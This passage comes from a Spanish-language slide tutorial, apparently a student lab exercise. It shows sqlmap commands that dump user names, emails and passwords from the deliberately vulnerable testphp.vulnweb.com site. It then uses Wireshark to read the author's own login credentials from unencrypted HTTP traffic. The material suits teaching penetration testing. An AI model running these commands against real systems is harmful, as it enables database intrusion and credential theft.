  • 15. 2. ATAQUE CON INYECCIÓN DE CÓDIGO SQL A SITIO WEB http://testphp.vulnweb.com/. Procedemos a instalar Python:
  • 16. Copiamos la carpeta de sqlmap en el disco donde está instalado Python
  • 17. Desde la ventana de símbolo de sistema accedemos a la carpeta que contiene los archivos sqlmap y ejecutamos el comando para obtener la información de la base de datos del sitio de BadStore: > color f4 > cd sqlmap
  • 18. Para obtener información de la base de datos buscamos primero una vulnerabilidad en la página digitando el código = al final de la dirección y observando el erros en la sintaxis de SQL.
  • 19. Cuando tenemos la vulnerabilidad entonces digitamos el siguiente código para obtener información: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 --dbs
  • 20. Ahora buscamos informacion en la pagina. Averiguamos que base de datos utiliza el sitio: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –current-db
  • 21. Ahora buscaremos la información correspondiente a las tablas que muestra la base de datos: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart – tables
  • 22. Ahora busquemos la informacion de las columnas de las tablas: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns
  • 23. Ahora podemos averiguar los datos de alguna columna de la tabla users, con el siguiente codigo: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C name
  • 24. Extraemos el contenido: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C name –dump
  • 25. Averiguamos el correo: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C email –dump
  • 26. Busquemos la contraseña: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C pass –dump
  • 27. Ahora el usuario: Sqlmap.py –u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart -- columns –T users –C uname –dump
  • 28. Ahora hagamos una prueba con los datos obtenidos del ataque en la pagina y verificamos que los datos obtenidos son reales:
  • 29. 3. ATAQUE POR SNIFFING  Para el ataque por sniffing utilizaremos el software de Wireshark.  Descargamos e instalamos en nuestro equipo el software:
  • 30. Una vez instalado el software de Wireshark procedemos a configurarlo y utilizarlo para nuestro análisis:
  • 31.  Abrimos el menu Capture, damos clic en opciones y seleccionanos nuestra tarjeta de red y le damos iniciar escaneo de red:
  • 32.  De esta forma se incia el escaneo del trafico en la red:
  • 33.  Ahora accederemos a una cuenta en un sitio web sin seguridad, de tipo http; en este caso utilizaremos una cuenta de www.directoriow.com:
  • 34.  Una vez logueados en el sitio con nuestros datos procedemos a usar Wireshark. Lo primero es dar clic en el botón Expression y escoger la opción HTTP – Hypertext transfer protocolo.
  • 35.  Dentro del menú de opciones damos clic en http.request.method.
  • 36.  Luego de esto buscamos la ip que destino que corresponde al sitio de www.directorio.com, que en este caso es 95.211.231.44.
  • 37.  Una vez identificada la ip podermos filtrar todo el trafico correspondiente a este sitio con el comando ip.addr==95.211.231.44.
  • 38.  Cuando tengamos filtrado el trafico del sitio, buscamos la línea que contiene el login? del usuario que utilizamos y en la ventana inferior en la opción de HTML Form URL Encoded podemos encontrar la información de usurario y contraseña que estamos buscando.
  • 39. REFERENCIAS  Recuperado:  https://www.youtube.com/watch?v=-C9TEBIfyrg   Recuperado:  http://rootear.com/seguridad/utilizando-sqlma   Recuperado:  https://www.youtube.com/watch?v=OPhqJTBGZsw   Recuperado:  http://www.hacktimes.com/sql_injection_con_sqlmap/